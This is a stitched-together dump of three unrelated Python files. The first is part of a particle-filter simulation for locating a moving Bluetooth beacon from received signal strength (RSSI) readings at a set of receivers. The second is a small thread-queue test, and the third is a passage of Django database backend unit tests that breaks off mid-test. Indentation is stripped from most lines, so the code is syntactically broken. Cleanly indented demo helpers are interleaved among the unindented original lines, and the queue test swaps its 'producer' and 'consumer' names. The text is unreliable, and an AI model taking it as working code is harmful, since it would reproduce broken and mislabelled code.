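        rssi = distance_to_RSSI(d)
        back = RSSI_to_distance(rssi)
        print("%.2f m -> %.1f dBm -> %.2f m" % (d, rssi, back))  # back ~= d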
# N_eff: effective sample size of the particle weights
def neff(weights):
return 1.0 / np.sum(np.square(weights))
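# Quick sanity check: uniform weights give N_eff equal to the particle count, while a single
# dominant particle drives N_eff towards 1 -- which is why animate() below resamples once
# N_eff drops under NumberOfParticles / 2.
def _neff_demo(N=100):
    uniform_w = np.full(N, 1.0 / N)
    peaked_w = np.zeros(N)
    peaked_w[0] = 1.0
    print(neff(uniform_w))  # N
    print(neff(peaked_w))   # 1.0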
def getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#reaOfTheMap=int( (ymax-ymin)*(xmax-xmin) )
step_size=(1/( np.ceil(np.sqrt(numberOfReceivers*1000) ) ) )
while True:
initial_points = np.mgrid[0:1+step_size:step_size, 0:1+step_size:step_size].reshape(2,-1).T
receiverPositions = KMeans(n_clusters=numberOfReceivers, random_state=0,n_init=100).fit(initial_points).cluster_centers_
if receiverPositions is not None:
receiverPositions[:,0]=xmin+receiverPositions[:,0]*(xmax-xmin)
receiverPositions[:,1]=ymin+receiverPositions[:,1]*(ymax-ymin)
return receiverPositions
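# Illustrative usage (hypothetical 50 x 50 m map): the k-means step above spreads the
# receivers roughly evenly by clustering a dense unit grid and then scaling the centers.
def _receiver_placement_demo():
    positions = getReceiverPositionsToInstall((0, 50), (0, 50), 4)
    print(positions)  # four well-separated [x, y] receiver positions inside the map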
def getBlockPositionsToInstall(xdims,ydims,numberOfBlocks):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfBlocksCreated=0
blockPositionsToInstall=[]
while numberOfBlocksCreated!=numberOfBlocks:
blockCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
collisionExists=False
for receiverPosition in receiverPositions:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,receiverPosition,receiverWidth,receiverLength):
collisionExists=True
break
intersectionWithOtherBlocksExists=False
if not collisionExists: # if collision exists, do not make other checks
for blockPosition in blockPositionsToInstall:
if checkRectangleRectangleIntersection(blockCoord,blockWidth,blockLength,blockPosition,blockWidth,blockLength):
intersectionWithOtherBlocksExists=True
break
if not collisionExists and not intersectionWithOtherBlocksExists:
blockPositionsToInstall.append(blockCoord)
numberOfBlocksCreated+=1
#print numberOfBlocksCreated
return np.array(blockPositionsToInstall)
def getRoomPositionsToInstall(xdims,ydims,numberOfRooms,roomBoundary):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
numberOfRoomsCreated=0
roomPositionsToInstall=[]
while numberOfRoomsCreated!=numberOfRooms:
roomCoord=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax])
receiverHollowRoomCollisionExists=False
for receiverPosition in receiverPositions:
if not checkFirstRectangleContainsSecondRectangle(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=-roomBoundary) and \
checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,receiverPosition,receiverWidth,receiverLength,boundaryForFirstRect=roomBoundary):
receiverHollowRoomCollisionExists=True
break
intersectionWithBlocksExists=False
if not receiverHollowRoomCollisionExists:
for blockPosition in blockPositions:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,blockPosition,blockWidth,blockLength,boundaryForFirstRect=roomBoundary):
intersectionWithBlocksExists=True
break
intersectionWithOtherRoomsExists=False
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists:
for roomPosition in roomPositionsToInstall:
if checkRectangleRectangleIntersection(roomCoord,roomWidth,roomLength,roomPosition,roomWidth,roomLength,boundaryForFirstRect=roomBoundary,boundaryForSecondRect=roomBoundary):
intersectionWithOtherRoomsExists=True
break
if not receiverHollowRoomCollisionExists and not intersectionWithBlocksExists and not intersectionWithOtherRoomsExists:
roomPositionsToInstall.append(roomCoord)
numberOfRoomsCreated+=1
#print numberOfRoomsCreated
return np.array(roomPositionsToInstall)
# main function
# strongSignalDistance -> up to how many meters we still treat a signal as strong; used for the confidence ellipse calculations
# sensitivityOfResult -> how fine-grained we are about the final position of our object of interest
# maxSignalError -> signals are erroneous in real life; to simulate this, add noise of up to this amount
# minUsefulSignal -> minimum signal value we still use for distance calculation
# minSignalValue -> minimum signal that can be caught at all; if a signal is weaker than this (the receiver is too far away), that receiver cannot catch it (see the small threshold sketch below)
# movingLimit -> how many meters at most our object moves at a time
# movingTendency -> in what direction and by how many meters our object tends to move
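# Small sketch of what the signal thresholds above mean in meters. The values are the
# animate() defaults; rssiAtOne and TX_Power come from the globals defined earlier.
def _signal_threshold_demo(minUsefulSignal=-90, minSignalValue=-100):
    print(RSSI_to_distance(minUsefulSignal))  # farthest distance still used for multilateration
    print(RSSI_to_distance(minSignalValue))   # beyond this a receiver cannot catch the signal at all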
def animate_dummy_init():
pass
def animate(iterNo, macID, currPerson, NumberOfParticles, xdims=(0, 50), ydims=(0, 50), maxSignalError=20, movingLimit=2, pastCoeff=0, minUsefulSignal=-90,
minSignalValue=-100,numberOfReceivers=4, sensitivityOfResult=1.0, strongSignalDistance=5 , movingTendency=np.array([0,0]) ):
print "iterNo is: ", iterNo
currPerson.move_beacon_in_map(xdims,ydims,movingLimit,movingTendency,roomBoundary=roomWallWidth/2)
#currPerson.beacon_pos = predefinedPos[iterNo]
currPerson.calc_RSSIs_to_Receivers(minSignalValue,minUsefulSignal,maxSignalError )
currPerson.setBeaconDistances_fromRSSIs(minUsefulSignal)
global numberOfNotFounds
print iterNo
isProcessed=False
if all(dist is None for dist in currPerson.distToReceivers):
#print "all distances are None, no processing"
numberOfNotFounds+=1
pass
else:
currPerson.averaged_beacon_pos = currPerson.multiLateration(xdims,ydims,sensitivityOfResult)
# 1st STEP
currPerson.predict_BLE(no_of_noise_elements = NumberOfParticles, movingLimit=movingLimit, pastCoeff = pastCoeff, xdims=xdims, ydims=ydims,movingTendency=movingTendency )
# 2nd STEP
currPerson.update_weights()
# resample if too few effective particles
if neff(currPerson.weights) < NumberOfParticles/2.0:
tmp_particles=np.zeros((NumberOfParticles, 2))
tmp_weights = np.zeros(NumberOfParticles)
tmp_particles[:]=currPerson.particles[:]
tmp_weights[:]=currPerson.weights[:]
currPerson.resample_from_higher_weights(tmp_particles, tmp_weights)
if np.allclose(tmp_weights, 1.0/NumberOfParticles):
currPerson.weights[:]=tmp_weights[:]
currPerson.particles[:]=tmp_particles[:]
else:
#print "no resampling is made for iteration " + iterNo
pass
currPerson.calc_PDF(strongSignalDistance,pastCoeff)
currPerson.prev_covMatrix=currPerson.covMatrix
currPerson.x_pp[:] = currPerson.x_prev[:] # or np.copyto(x_pp,x_prev)
currPerson.x_prev[:] = currPerson.particles[:] # or np.copyto(x_prev,particles)
global OverallError
CurrAccuracy = np.linalg.norm(currPerson.mu-currPerson.beacon_pos)
OverallError += CurrAccuracy
# https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib
particles_x,particles_y=np.hsplit(currPerson.particles,2)
if iterNo == totalIterNo-1:
with open(sys.argv[4]+"_avgError.txt","a+") as outFile:
if OverallError!=0:
outFile.write(str(OverallError/(totalIterNo-numberOfNotFounds) ) + "\n")
else:
outFile.write(str(OverallError) + "\n")
with open(sys.argv[4]+"_noSignalError.txt","a+") as outFile:
outFile.write(str(numberOfNotFounds) + "\n" )
####################################################################################################################################################################################
if __name__ == '__main__':
main()
|
testQueue.py
|
from context import *
import sys
import threading
import time
import random
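# consumer() below pushes 1000 test elements into the shared queue; producer() pops them back out at random intervals.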
def consumer(queue):
print 'Received queue'
for i in range(1000):
queue.push('Elem %d' % i)
def producer(queue):
print 'Received queue'
while(True):
time.sleep(random.randint(0,2))
print 'Found: %s' % queue.pop()
pass
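# SyncQueue itself comes from the (not shown) context module; the sketch below is only an
# assumption of what a minimal thread-safe queue with this push/pop API might look like,
# not the actual implementation used by this test.
import threading as _sketch_threading

class _SketchSyncQueue(object):
    """Minimal blocking FIFO: push() appends an item, pop() waits until one exists."""
    def __init__(self):
        self._items = []
        self._cond = _sketch_threading.Condition()

    def push(self, item):
        with self._cond:
            self._items.append(item)
            self._cond.notify()

    def pop(self):
        with self._cond:
            while not self._items:
                self._cond.wait()
            return self._items.pop(0)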
def main():
print 'starting'
queue = SyncQueue()
tc = threading.Thread(target=consumer, args=(queue,))
tc.daemon = True
tc.start()
tp = threading.Thread(target=producer, args=(queue,))
tp.daemon = True
tp.start()
try:
while True:
# print 'still here'
tc.join(600)
tp.join(600)
if not tc.isAlive():
break
if not tp.isAlive():
break
except KeyboardInterrupt:
print "Ctrl-c pressed ..."
print "Closing connections"
sys.exit(1)
if __name__ == '__main__':
main()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
from decimal import Decimal
import re
import threading
import unittest
import warnings
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (connection, connections, DEFAULT_DB_ALIAS,
DatabaseError, IntegrityError, reset_queries, transaction)
from django.db.backends import BaseDatabaseWrapper
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.utils import format_number, CursorWrapper
from django.db.models import Sum, Avg, Variance, StdDev
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (TestCase, TransactionTestCase, override_settings,
skipUnlessDBFeature, skipIfDBFeature)
from django.test.utils import str_prefix, IgnoreAllDeprecationWarningsMixin
from django.utils import six
from django.utils.six.moves import xrange
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in xrange(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
statements = connection.creation.sql_create_model(models.Square,
style=no_style())
match = re.search('"id" ([^,]+),', statements[0][0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
        Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
        Test that last_executed_query() returns a Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
        # response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
reset_queries()
with connection.cursor() as cursor:
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
